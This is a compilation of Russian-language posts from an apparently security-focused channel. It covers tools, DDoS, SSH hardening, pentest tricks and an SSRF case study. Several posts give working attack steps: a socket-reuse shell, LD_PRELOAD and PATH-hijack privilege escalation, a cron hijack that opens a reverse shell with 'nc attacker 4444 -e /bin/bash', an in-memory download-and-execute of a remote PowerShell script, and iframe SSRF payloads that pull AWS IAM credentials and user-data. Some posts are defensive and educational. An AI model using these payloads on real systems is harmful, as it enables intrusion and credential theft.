LazyOwn: AI, который меняет правила игры в RedTeam

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что там такого: LazyOwn — это так то первый в мире RedTeam/APT фреймворк с ИИшкой в центре управления.
AI помогает управлять сложными кампаниями, а продвинутые rootkit-модули и самоконфигурируемые бекдоры маскируют атаки, чтобы никто не заметил твоих действий.

⏺Почему это реально круто: Буквально полезнейший партнёр в атаке. AI помогает подстраивать команды под любую цель, а 333+ готовых атак и интеграция с Atomic RedTeam дают безграничные возможности. Управляйте всем через удобный веб или консоль из любой точки мира, а крутые rootkit-модули и самонастраивающиеся бекдоры надёжно прячут ваши следы.

ZeroDay | #Инструмент

DDoS-защита или как вам продают страх

👋 Приветствую в мире цифровой безопасности!

Расскажу чуток правды о рынке DDoS-защиты. И узнаете, почему вам, ну скорее всего, не нужен дорогой анти-DDoS.

⏺Что происходит при атаке: сайт «ложится» из-за лавины запросов - чаще всего к статическим файлам (например, картинке). Хостинг это замечает и отключает сайт. Ну и потом вам предлагают «решение» за деньги.

⏺Почему именно мой сайт: Иногда атака попадает «прицепом», чтобы скрыть реальную цель. Трафик от ботнета размазывают по случайным сайтам, чтобы запутать фильтры и SOC’и.

⏺Атака на провайдера, не на вас: L3/L4-атаки — это удары по каналам провайдера. Защита от них - это защита их инфраструктуры. Часто она уже включена в тариф

⏺А вот L7 - уже реально ваша проблема: Если атакуют сам сайт (через формы, страницы, API) - это уровень L7. И вот тут начинаются предложения WAF, платных прокси, облаков и подписок на «защиту от ботов».

⏺Можно ли защититься самому: Да, вполне. Самый простой способ - поставить перед сайтом JS-чек, как делает CloudFlare. Он отсекает простых ботов мгновенно. Делается это через nginx, Apache или даже простую страницу на отдельном сервере.

ZeroDay | #DDoS

Жёстко защищаем SSH: отключаем всё лишнее

👋 Приветствую в мире цифровой безопасности!

Расскажу, как настроить SSH так, чтобы и вам было удобно, и атакующему почти невозможно.

⏺Скрываем баннеры и метаинформацию: Удалим лишние детали, которые помогают хакеру на этапе fingerprinting:

# SSH
sed -i 's/^#Banner.*/Banner \/dev\/null/' /etc/ssh/sshd_config
echo "" > /etc/issue.net
echo "" > /etc/issue

# Nginx
server_tokens off;

⏺Отключаем ICMP и снижаем TTL: Не палимся в ping’ах и сканерах:

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
sysctl -w net.ipv4.ip_default_ttl=61

TTL 64 почти всегда Linux. Сделаем чуть ниже, чтобы не выдать ОС.

⏺Включаем TCP Stealth Mode: Прячем открытые порты от nmap и masscan:

iptables -A INPUT -p tcp --syn -m recent --name portscan --set
iptables -A INPUT -p tcp --syn -m recent --name portscan --update --seconds 60 --hitcount 4 -j DROP

Скрипты для быстрой разведки будут получать пустой ответ или баниться.

⏺Логируем то, что обычно не логируют: Добавим контроль доступа к редко проверяемым местам:

auditctl -w /etc/crontab -p wa
auditctl -w /var/log/auth.log -p w

Если кто-то начнёт ковырять автообновления или чистить следы - узнаем первыми.

ZeroDay | #безопасность

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.

⏺Повторное использование сокета (socket reuse shell): Если у вас уже есть соединение с сервером (например, через баг), можно не открывать новое, а “подцепиться” к существующему:

dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execve("/bin/sh", 0, 0);

Это даст вам интерактивный shell — даже если сервер блокирует исходящие подключения. Часто используют, когда outbound-трафик закрыт.

⏺LD_PRELOAD для подмены системных функций: Некоторые программы доверяют переменной LD_PRELOAD. Это значит, вы можете подсовывать им свою библиотеку, которая изменит поведение:

// preload.c
int getuid() { return 0; }

Собираем и подставляем:

gcc -shared -fPIC -o preload.so preload.c
LD_PRELOAD=$PWD/preload.so ./some_binary

Так можно обмануть программу и, например, сделать так, чтобы она “думала”, что вы root.

⏺Подмена системной команды через PATH: Если программа вызывает команды вроде whoami, а вы можете изменить переменную окружения PATH - можно подсунуть свою:

echo "/bin/bash" > whoami
chmod +x whoami
export PATH=$PWD:$PATH
sudo some_script

Программа подумает, что вызывает системный whoami, а на деле выполнит shell.

ZeroDay | #пентест

«Срочно требуется твоя помощь: войди в мой iCloud»

Всё начинается с безобидной просьбы: «войди в мой iCloud, у меня проблемы с телефоном». Через минуту — ваш iPhone в режиме пропажи, пароль сменён, а доступ к устройству просят выкупом.

⏺В статье о том, как старая схема с фишингом и корпоративными Apple ID до сих пор успешно работает. Объясняем, как злоумышленники захватывают устройства, даже не касаясь их, и что делать, если вы уже ввели чужой логин.

ZeroDay | #Статья

CDK: тестируем изоляцию в Docker и Kubernetes

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: CDK — это такой «многофункциональный нож» для тех, кто хочет узнать, как изящно взломать контейнер и разгулять по всей сети Kubernetes.

⏺Что умеет: За один запуск CDK проверит ваши capabilities, осмотрит точки монтирования, изучит процессы и сокеты, а также выведет подсказки, что именно можно юзать для атаки или защиты.

⏺Как использовать: Запускаете CDK с правами, даёте доступ к хосту — и получаете полный обзор безопасности. Можно прямо из контейнера пробовать разные эксплойты или собрать инфу для последующего анализа.

docker run --rm -it --cap-add=ALL --privileged --pid=host -v /:/host ghcr.io/deepfence/cdk-go:latest

ZeroDay | #Инструмент

📝 Что такое DevSecOps

DevSecOps — целый подход, когда безопасность включается в каждый этап разработки. Она не мешает процессу, а усиливает его.

⏺Security Checks & Scans: Автоматический анализ кода помогает находить уязвимости до выхода в прод. Используются статические и динамические проверки.

⏺Continuous Monitoring: Системы следят за логами, действиями пользователей и трафиком. Это позволяет вовремя реагировать на угрозы.

⏺CI/CD: Автоматизированные пайплайны включают встроенные проверки безопасности. Код проверяется до и после сборки.

⏺Infrastructure as Code: Инфраструктура управляется через код. Это даёт контроль, повторяемость и возможность проверять конфигурации.

⏺Container Security: Контейнеры и образы сканируются на этапе сборки. Рантайм-контроль обеспечивает безопасность во время работы.

⏺Key Management: Доступ к секретам централизуется. Ключи и токены хранятся в защищённых системах вроде Vault.

⏺Threat Modeling: Угрозы рассматриваются ещё до написания кода. Архитектура проектируется с учётом потенциальных атак.

⏺QA Integration: Проверки безопасности становятся частью тестирования. Это снижает риски ещё на этапе контроля качества.

⏺Collaboration and Communication: Dev, Sec и Ops работают вместе. Безопасность — это совместная задача, а не чья-то обязанность.

⏺Vulnerability Management: Уязвимости выявляются, отслеживаются и устраняются постоянно. Работа с ними встроена в ежедневные процессы.

ZeroDay | #ИБ

👋 Приветствую в мире цифровой безопасности!

Сделал для вас новую подборку крутых бесплатных курсов по ИБ и не только на YouTube.

⏺ CS50 курс по кибербезу
⏺ Полный курс за 11 часов
⏺ Учимся кибербезу с нуля до про
⏺ Курс по OSINT
⏺ Linux для этичных хакеров

ZeroDay | #Подборка

Руководство по pgcrypto — шифруем данные прямо в PostgreSQL. Часть 2

Если хотим хранить важные данные в базе под надежной защитой, но нет желания заморачиваться с отдельными сервисами - pgcrypto поможет сделать это прямо внутри PostgreSQL.

⏺В этой статье расскажу, как на практике использовать pgcrypto: шифруем колонки, хешируем пароли, проверяем, что данные не подменили, и даже передаем зашифрованные сообщения через PGP. При этом разберем, как не убить производительность. Криптография требует ресурсов, и с этим нужно уметь работать.

ZeroDay | #Статья

Invoke-ADEnum: автоматизация аудита Active Directory

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: Invoke-ADEnum - PowerShell-скрипт, который моментально собирает тонну полезной информации по вашему AD.

⏺Что умеет: за один запуск вы получите полный отчёт по пользователям, группам, компьютерам, политике паролей, GPO и другим важным штукам. Всё это красиво оформлено в HTML с возможностью выгрузки в CSV и XLSX - чтобы показать коллегам или использовать для анализа.

⏺Как использовать: запустите скрипт на любой машине с доступом к домену и вот, у вас готов детальный аудит. Не обязательно быть в домене, главное - это доступ.

Вот пример простого запуска:

.\Invoke-ADEnum.ps1 -ReportPath .\ADReport.html

Делаем пост с использованием на практике?

ZeroDay | #Инструмент

Invoke-ADEnum: аудит Active Directory за пару минут

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём, как быстро собрать информацию о структуре Active Directory.

⏺Сценарий: вы проводите аудит или делаете ревизию AD-инфраструктуры. Вручную собирать сведения о пользователях, группах, GPO и правах доступа - долго и неудобно. Поэтому юзаем Invoke-ADEnum.

⏺Пример запуска:

# Загрузка скрипта в память
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1')

# Запуск полной проверки
Invoke-ADEnum -AllEnum -Force

⏺Или более точечно - поиск локальных админов, RBCD и подозрительных GPO:

Invoke-ADEnum -FindLocalAdminAccess -RBCD -UserCreatedObjects -GPOsRights -MoreGPOs -AllDescriptions

Вы можете запускать скрипт даже с машины вне домена. Главное, чтобы был доступ к AD.

ZeroDay | #инструмент

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.

⏺SSH подмена через ProxyCommand: Когда у цели открыт SSH, но нужен MITM, используйем подмену через ProxyCommand:

Host target
    ProxyCommand ncat --proxy attacker_ip:1080 --proxy-type socks5 %h %p

⏺SUID-бинарники: но не find, а getcap: Часто забывают, что кроме SUID есть capabilities, которые тоже дают root-like поведение. Быстрый способ найти:

getcap -r / 2>/dev/null

Если увидишь, например:

/usr/bin/python3 = cap_setuid+ep

Поздравляю, у вас фактически шелл от рута без эксплойтов.

⏺Подмена скриптов через PATH-атаку: Когда у вас доступ к конфигам, или вы находите странный cron, проверьте, вызываются ли команды с абсолютным путём. Если нет, можно создать свой ls, tar, cp, подменить PATH, и получить выполнение:

echo "/tmp" > /etc/cron.d/fakelist
echo -e '#!/bin/bash\nnc attacker 4444 -e /bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

ZeroDay | #пентест

Как я устал тестировать LLM вручную, и сделал универсальный сканер уязвимостей

Когда ты в сотый раз копипастишь один и тот же prompt в чат-бота, приходит озарение: «А зачем вообще это делает человек, если у нас есть ИИ?» Так родился сканер для LLM: тестирует на уязвимости, как будто это веб-приложение, только вместо SQL-инъекций prompt injection.

⏺В статье рассказывается, как обычный корпоративный бот на RAG вдруг начал сливать конфиденциалку, как выглядят настоящие атаки на LLM, и как я автоматизировал проверку на prompt injection, data leakage и context abuse.

ZeroDay | #Статья

Deluder: перехват трафика там, где прокси бессильны

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: Deluder - это инструмент для перехвата трафика у приложений, которые не умеют работать с прокси. Да, таких много. Использует Frida и динамическую инструментацию, чтобы внедриться в сетевые библиотеки прямо в реальном времени. Поддерживает WinSock, OpenSSL, GnuTLS, SChannel и даже обычные Linux sockets.

⏺Почему это удобно: Потому что вам не надо ничего патчить. Просто цепляемся к процессу - и начинаем наблюдать трафик даже у десктопных GUI-программ, которые вообще не подозревают о MITM. Отлично дружит с PETEP, но можно использовать и отдельно.

ZeroDay | #Инструмент

Как превратить простую HTML-инъекцию в SSRF с помощью рендеринга PDF

👋 Приветствую в мире цифровой безопасности!

Сегодня покажу, как простая HTML-инъекция в генераторе сертификатов привела к с SSRF с утечкой AWS-доступа.

⏺С чего всё началось: Тестируя сайт онлайн-курсов, я почти ушёл ни с чем. Но потом наткнулся на сертификат, который генерируется сервером в PDF или PNG после завершения курса. Можно было ввести name, title и quote.

⏺Первые находки: В параметре title HTML не фильтровался.

➡️"<i>ahmed</i>" — текст стал курсивом.
➡️"<iframe src='https://sub.0xxnum.fun/test'></iframe>" — сработало.

А вот script, onerror и XSS не сработали. Это была HTML-инъекция, но рендер происходил на бэке.

⏺Что это дало: PDF-генерация происходила через headless-браузер. Это означало, что я могу встроить <iframe> с URL, и сервер сам сделает запрос. Привет, SSRF.

⏺Дальше еще интереснее: Я начал направлять iframe на локальные ресурсы (https://127.0.0.1:3000, 169.254.169.254) — и получил неожиданный ответ в PDF. Так, постепенно я добрался до метаданных AWS EC2-инстанса и вытянул access tokens.

⏺Что сработало:

"title": "<iframe src='https://169.254.169.254/latest/meta-data/iam/security-credentials/role-name'></iframe>"

Делаем вторую часть?

ZeroDay | #атака

Как превратить простую HTML-инъекцию в SSRF с помощью рендеринга PDF. Ч.2

👋 Приветствую в мире цифровой безопасности!

Сегодня продолжу говорить про то, как простая HTML-инъекция в генераторе сертификатов привела к с SSRF с утечкой AWS-доступа.

⏺Подтверждаем SSRF: После того как <iframe> с внешним URL сработал, я захотел понять — а сервер точно сам ходит по этим ссылкам? Для этого сделал редирект на свой контролируемый домен:

"title": "<iframe src='https://sub.tarek.dev/probe'></iframe>"

И, как только PDF был сгенерирован, я получил DNS и HTTP-запрос на свой listener. Это подтвердило: HTML рендерится браузероподобным инструментом, и сервер действительно загружает внешние ресурсы.

⏺Выход на метаданные AWS: SSRF был налицо, и я перешёл к следующей цели - 169.254.169.254 — стандартному адресу метаданных AWS-инстансов.

"title": "<iframe src='https://169.254.169.254/latest/meta-data/'></iframe>"

PDF вернулся с содержимым страницы метаданных. Я пошёл дальше - запрашиваю IAM credentials:

"title": "<iframe src='https://169.254.169.254/latest/meta-data/iam/security-credentials/'></iframe>"

Вижу имя роли, например, my-app-instance-role.

⏺Финальный удар - доступ к AWS: Теперь знаю имя роли, и нацеливаюсь точнее:

"title": "<iframe src='https://169.254.169.254/latest/meta-data/iam/security-credentials/my-app-instance-role'></iframe>"

В PDF прилетели:
• AccessKeyId
• SecretAccessKey
• Token

Эти временные креды можно было использовать для доступа к S3, DynamoDB, CloudWatch и другим сервисам AWS, в зависимости от привилегий роли.

⏺И насчет user-data: А вдруг dev-опсы оставили что-то интересное в скриптах и переменных окружения?

"title": "<iframe src='https://169.254.169.254/latest/user-data'></iframe>"

Иногда там лежат secrets, API-токены, начальные скрипты с логикой деплоя.

ZeroDay | #атака